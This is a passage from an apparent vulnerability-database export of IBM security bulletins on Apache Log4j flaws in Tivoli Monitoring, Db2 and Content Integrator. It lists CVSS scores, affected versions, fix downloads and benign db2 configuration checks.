this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Monitoring| 6.3.0 \n \n## Remediation/Fixes\n\nIn addition to the CVE in this bulletin the following are also addressed by the WebSphere patch below:\n\n[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)\n\n \nFix Name| VRMF| Remediation/Fix Download \n---|---|--- \n6.3.0.7-TIV-ITM-SP0010| 6.3.0.7 Fix Pack 7 Service Pack 10| <https://www.ibm.com/support/pages/node/6550868> \n6.X.X-TIV-ITM_TEPS_WAS-IHS_ALL_8.55.20.02| 6.3.0.7 Fix Pack 7 Service Pack 5 or later| <https://www.ibm.com/support/pages/node/6538128> \n \n## Workarounds and Mitigations\n\nNone of the vulnerable instances of log4j are actually used by ITM. If enabled, the IBM Tivoli Monitoring dashboard data provider may be using log4j client libraries which are not the actual log4j core function. Note all versions of log4j components are only installed if you've installed one of the following components:\n\ncj Tivoli Enterprise Portal Desktop Client \ncw Tivoli Enterprise Portal Browser Client \ncq Tivoli Enterprise Portal Server \n\nThe provided remediation will safely remove or update all vulnerable instances of log4j.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n31 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSZ8F3\",\"label\":\"IBM Tivoli Monitoring V6\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"6.3.0.7\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-31T20:11:37", "type": "ibm", "title": "Security Bulletin: Vulnerablity in Apache Log4j may affect IBM Tivoli Monitoring (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-31T20:11:37", "id": "08803B708D4CA95FF8DD68A4DE7FBE7DEAA67387194E25D8CD693B135E7332D9", "href": "https://www.ibm.com/support/pages/node/6551452", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:07:15", "description": "## Summary\n\nApache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by multiple vulnerabilities that could allow a remote attacker to execute arbitrary code on the system or cause a denial of service. This library is used by the Db2 Federation feature. The fix for the vulnerability is to update the Apache Log4j library to 2.17.0. Please see CVE-2021-4104 for bulletin relating to Log4j V1. Please see CVE-2021-44832 and CVE-2021-44228 for bulletins relating to Log4j V2.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFix pack levels of IBM Db2 V11.5 for all editions on all platforms are affected only if the following features are configured:\n\nFederation: \n\n * DVM JDBC wrapper driver,\n * NoSQL wrapper driver (for Hadoop),\n * Blockchain wrapper driver (for Hyperledger Fabric, Linux 64-bit, x86-64 only)\n\nIBM Db2 V9.7, V10.1, V10.5 and V11.1 are not affected. Please note that log4j v1.x was removed in a previous build, and customers are strongly recommended to apply those fixes if you are on an older version of Db2. See [Security Bulletin](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin\" ) for details. \n\n\nTo determine if Federation is enabled, issue the following:\n\ndb2 get dbm cfg | grep FEDERATED\n\nIf a value of NO is returned, you are not vulnerable.\n\nYou can determine if you are using one of the affected wrappers by performing:\n\nTo determine if the DVM JDBC wrapper is in use, issue the following statement:\n\ndb2 \"select servername from syscat.serveroptions where option = 'DRIVER_CLASS' and setting = 'com.rs.jdbc.dv.DvDriver'\"\n\nIf a servername is returned, then you are using the DVM JDBC wrapper via the DvDriver class.\n\n \nTo determine if the NoSQL hadoop wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.servers where servertype = 'HDFSPARQUET'\" \n\nIf 1 or more rows are returned, then NoSQL hadoop wrapper is in use.\n\nTo determine if the NoSQL Blockchain wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.serveroptions where option='PEER_URL'\"\n\nIf 1 or more rows are returned, then NoSQL Blockchain wrapper is in use.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for the V11.5.6 and V11.5.7 release. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\nNote: These builds supersede the builds provided for resolution to [CVE-2021-44228](<https://www.ibm.com/support/pages/node/6526462> \"CVE-2021-44228\" ) and [CVE-2021-4104](<https://www.ibm.com/support/pages/node/6528678> \"CVE-2021-4104\" )\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV11.5| TBD| [IT39474](<https://www.ibm.com/support/pages/apar/IT39474> \"IT39474\" )| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135867_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A427692916793185792&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13478_135868_DSClients-linuxia32-client-11.5.6.0-FP000%3A229400084660469792&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135870_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A138274479725175920&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135866_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A979582216771911552&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135869_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A276882097350046112&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13478_135865_DSClients-nt32-client-11.5.6000.1809-FP000%3A661797018354168448&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135864_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A583179472819140992&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| TBD| [IT39474](<https://www.ibm.com/support/pages/apar/IT39474> \"IT39474\" )| Special Build for V11.5.7: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13495_135874_DB2-aix64-universal_fixpack-11.5.7.0-FP000%3A882984004730045184&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13495_135881_DSClients-linuxia32-client-11.5.7.0-FP000%3A380686632476346944&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13495_135875_DB2-linuxx64-universal_fixpack-11.5.7.0-FP000%3A731031925600317568&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13495_135878_DB2-linuxppc64le-universal_fixpack-11.5.7.0-FP000%3A997597708897637504&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13495_135876_DB2-linux390x64-universal_fixpack-11.5.7.0-FP000%3A582970015794042880&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13495_135872_DSClients-nt32-client-11.5.7000.1973-FP000%3A354355677084323712&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13495_135873_DB2-ntx64-universal_fixpack-11.5.7000.1973-FP000%3A946279470796772096&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \n## Workarounds and Mitigations\n\nNone.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-4104)](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin: \u00a0Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \\(CVE-2021-4104\\)\" )\n\nSee [Security Bulletin: A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6549888> \"Security Bulletin: \u00a0A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0\\(CVE-2021-44832\\)\" )\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6526462> \"Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \\(CVE-2021-44228\\)\" )\n\n## Acknowledgement\n\n## Change History\n\n06 June 2022: Added cross reference to other Log4j bulletins \n28 Jan 2022: Added clarification for not affected versions. \n27 Dec 2021: Added 11.5.6 link for Windows 64-bit fix pack \n24 Dec 2021: Added 11.5.7 links for Windows 32-bit and Windows 64-bit fix packs \nAdded 11.5.6 link for Windows 32-bit fix pack \n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Product\":{\"code\":\"SSEPGG\",\"label\":\"DB2 for Linux- UNIX and Windows\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"11.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-07T03:35:15", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-06-07T03:35:15", "id": "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "href": "https://www.ibm.com/support/pages/node/6528672", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:06:30", "description": "## Summary\n\nThere are multiple vulnerabilities in Log4j used by IBM Content Integrator. IBM Content Integrator is not affected by these vulnerabilities. However, the team has addressed vulnerabilities by removing references.\n\n## Vulnerability Details\n\n**CVEID: CVE-2021-44228** \nDESCRIPTION: Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure \nto protect against attacker-controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially \ncrafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take \ncomplete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/214921 for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n**CVEID: CVE-2021-45046** \nDESCRIPTION: Apache Log4j could result in remote code execution, caused by an incomplete fix \nof CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default \nPattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft \nmalicious input data using a JNDI Lookup pattern to leak sensitive \ninformation and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/215195 for the current score. \nCVSS Vector: Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n**CVEID: CVE-2021-45105** \nDESCRIPTION: Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled \nrecursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could \ncraft malicious input data that contains a recursive lookup to cause a StackOverflowError \nthat will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/215647 for the current score. \nCVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n**CVEID: CVE-2021-4104** \nDESCRIPTION: Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the \ndeserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to \nuse JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/215048 for the current score. \nCVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\n\n**CVEID: CVE-2021-38951** \nDESCRIPTION: IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 is vulnerable to a denial of service, \ncaused by sending a specially-crafted request. A remote attacker could exploit this vulnerability to \ncause the server to consume all available CPU resources. IBM X-Force ID: 211405. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/211405 for the current score. \nCVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Content Integrator | 8.6 \n \n## Remediation/Fixes\n\nIBM Content Integrator 8.6.0.4 IF0009 [Fix Central](<https://www.ibm.com/support/fixcentral/swg/doSelectFixes?options.selectedFixes=ICI_8604-IF0009&continue=1> \"Fix Central\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n5 May 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSWLLY\",\"label\":\"Content Integrator\"},\"ARM Category\":[{\"code\":\"a8m0z000000cwNnAAI\",\"label\":\"Content Integrator\"}],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-05T14:49:44", "type": "ibm", "title": "Security Bulletin: IBM Content Integrator is not affected by multiple vulnerabilities in Log4j", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38951", "CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-05-05T14:49:44", "id": "AD5C7F7150FBD846C587F5FAD0D7C7B48F81990F52A351F824E5CBBBAC83F163", "href": "https://www.ibm.com/support/pages/node/6582359", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:05:08", "description": "## Summary\n\nApache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by a vulnerability that could allow a remote attacker to execute arbitrary code on the system. This bulletin covers the vulnerability caused when using versions of log4j earlier than 2.0. This version of the library is used by the ECM (Text Search) feature . CVE-2021-44228 is addressing a critical vulnerability in 2.0 <= log4j <= 2.15.0 covered in a separate security bulletin. Please see CVE-2021-44832, CVE-2021-45046, and CVE-2021-45105 for bulletins relating to Log4j V2.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThe ECM (Text Search Server) feature in all fix pack levels of IBM Db2 V10.5, V11.1, and V11.5 for all server editions on all platforms are affected. \n\nIBM Db2 V10.1 and V9.7 are not affected.\n\nIn the V11.1 release, the Hadoop federation wrapper is also impacted.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V10.5, v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release: V10.5 FP11, V11.1.4 FP6, V11.5.6, and V11.5.7. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\nFor ECM (Text Search Server)\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV10.5| TBD| [IT39390](<https://www.ibm.com/support/pages/apar/IT39390> \"IT39390\" )| Special Build for V10.5 FP11: \n\n[AIX 